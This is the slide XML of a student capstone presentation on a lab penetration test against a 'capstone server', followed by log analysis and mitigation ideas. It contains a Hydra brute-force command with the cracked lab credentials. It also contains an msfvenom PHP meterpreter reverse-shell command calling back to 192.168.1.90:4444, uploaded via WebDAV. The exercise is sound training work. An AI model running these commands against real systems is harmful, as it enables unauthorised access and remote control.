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9D4502-2CF4-4DBF-8ED5-DE3039875F61}">
  <a:tblStyle styleId="{499D4502-2CF4-4DBF-8ED5-DE3039875F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2db2a317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2db2a317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5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3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34.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1.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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3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69.png"/><Relationship Id="rId8"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80.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId8"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4.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId9"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4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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10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1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192.168.1.105/company_folders/secret_folder" TargetMode="External"/><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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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8.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8.pn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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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br>
              <a:rPr lang="en" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>By Matthew Baker</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[Brute-Force Attack using Hydra]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1121" name="Google Shape;112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2" name="Google Shape;1122;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="457175" y="1273900"/>
            <a:ext cx="3796500" cy="1575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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397700" y="1187072"/>
            <a:ext cx="3906900" cy="1575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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f 192.168.1.105 http-get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://192.168.1.105/company_folders/secret_folder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rPr>
              <a:t>I used Hydra which is already pre-installed on Kali Linux. I also required a password list – in this case I used rockyou.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1124" name="Google Shape;1124;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="740428"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1125" name="Google Shape;1125;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6" name="Google Shape;1126;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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4520656" y="740428"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1128" name="Google Shape;112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9" name="Google Shape;112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63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4671475" y="1273900"/>
            <a:ext cx="3987300" cy="1575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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4555375" y="1187075"/>
            <a:ext cx="4219500" cy="1944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br>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>- The exploit provided confirmation of the login name</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t> ‘ashton’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> as well as the password </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>‘leopoldo’</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>- access to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1100"/>
              <a:t>/secret_folder</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>- access to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1100"/>
              <a:t>/webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> system</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>- able to establish a reverse shell with the PHP payload on the victim system. Opened a listener on Port 4444.</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="24597" l="0" r="5329" t="26058"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1186263" y="2953813"/>
            <a:ext cx="6771475" cy="1858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[Reverse Shell Backdoor CVE-2019-13386]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138" name="Google Shape;1138;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9" name="Google Shape;1139;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="28052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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207000" y="148057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t>$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=4444 -o shell.php </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I used msfvenom and meterpreter to deliver a payload onto the vulnerable machine (the capstone server)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>$ cat flag.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1141" name="Google Shape;1141;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="149431" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1142" name="Google Shape;1142;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3" name="Google Shape;1143;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64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2759056" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1145" name="Google Shape;1145;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6" name="Google Shape;1146;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64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="300110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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2920425"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rPr>
              <a:t>Created a reverse shell payload and moved it to WebDav server as Ryan. Listened to the host and port.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Once executed the attacker could listen to the Capstone server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Discovery of Flag file as: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b1ng0w@5h1sn@m0</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1149" name="Google Shape;1149;p64"/>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4"/>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51" name="Google Shape;1151;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5340" l="0" r="24339" t="75767"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3338200" y="807975"/>
            <a:ext cx="5641026" cy="693325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1152" name="Google Shape;1152;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5285" l="0" r="44093" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5658875" y="1421375"/>
            <a:ext cx="3246424" cy="3369151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1153" name="Google Shape;1153;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8181381" y="1070115"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1154" name="Google Shape;1154;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5" name="Google Shape;1155;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1" name="Google Shape;1161;p6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2" name="Google Shape;1162;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8" name="Google Shape;116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9" name="Google Shape;1169;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1789950"/>
            <a:ext cx="8409300" cy="26913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170" name="Google Shape;1170;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="675975"/>
            <a:ext cx="84699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Font typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The port scan of 192.168.1.90 occurred on 28th of April 2022, at 04:25 AM.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There were 4 nmap scan attempts made to the server on 28th April. Error codes 401, 301, 200, 204 were detected. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The sudden increase in traffic at the time means that there was likely a port scan conducted. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1171" name="Google Shape;1171;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="675987"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1172" name="Google Shape;1172;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="528138" y="1865824"/>
            <a:ext cx="8087723" cy="2539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8" name="Google Shape;1178;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67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1642675"/>
            <a:ext cx="8409300" cy="28680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80" name="Google Shape;1180;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="741300"/>
            <a:ext cx="8309100" cy="9717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rPr>
              <a:t>The requests occurred on April 28th at 4:33AM </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There were 28 requests coming from the IP address of 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The files that were requested was the “/secret_folder/” file from the ‘/company_folders/’ directory. They contained Ryan’s Password Hash.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1181" name="Google Shape;1181;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="741312"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1182" name="Google Shape;1182;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="467413" y="1713012"/>
            <a:ext cx="8209163" cy="266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8" name="Google Shape;1188;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9" name="Google Shape;1189;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1331250"/>
            <a:ext cx="9168600" cy="34089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190" name="Google Shape;1190;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="697750"/>
            <a:ext cx="85587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16,772 packet requests made by a Brute-Force attack (Hydra) to the ‘secret_folder’</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Two attacks were </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>successful. The http response code 301 indicates a successful discovery of the correct password and was redirected to another webpage. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1191" name="Google Shape;1191;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="741312"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1192" name="Google Shape;1192;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="5455" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="44650" y="1382849"/>
            <a:ext cx="7531977" cy="2483001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1193" name="Google Shape;1193;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="1101" r="5589" t="7330"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2481000" y="2635725"/>
            <a:ext cx="6675302" cy="23442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9" name="Google Shape;1199;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0" name="Google Shape;1200;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1398788"/>
            <a:ext cx="8409300" cy="28518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01" name="Google Shape;1201;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="586050" y="714575"/>
            <a:ext cx="76821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8 hits were made to the WebDAV directory (192.168.1.105/webdav) </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The files passwd.dav and shell.php were requested.  </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1202" name="Google Shape;1202;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="586050" y="714587"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1203" name="Google Shape;1203;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="586050" y="1467775"/>
            <a:ext cx="7971900" cy="2713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7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9" name="Google Shape;1209;p70"/>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10" name="Google Shape;1210;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16" name="Google Shape;1216;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7" name="Google Shape;1217;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1483025"/>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300"/>
              <a:t>What kind of alarm can be set to detect future port scans? </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>An alarm that triggers once a port scan has been conducted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>that targets multiple ports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>would be optimal. </a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Block traffic via firewall on ports 80, 443 and 4444.</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
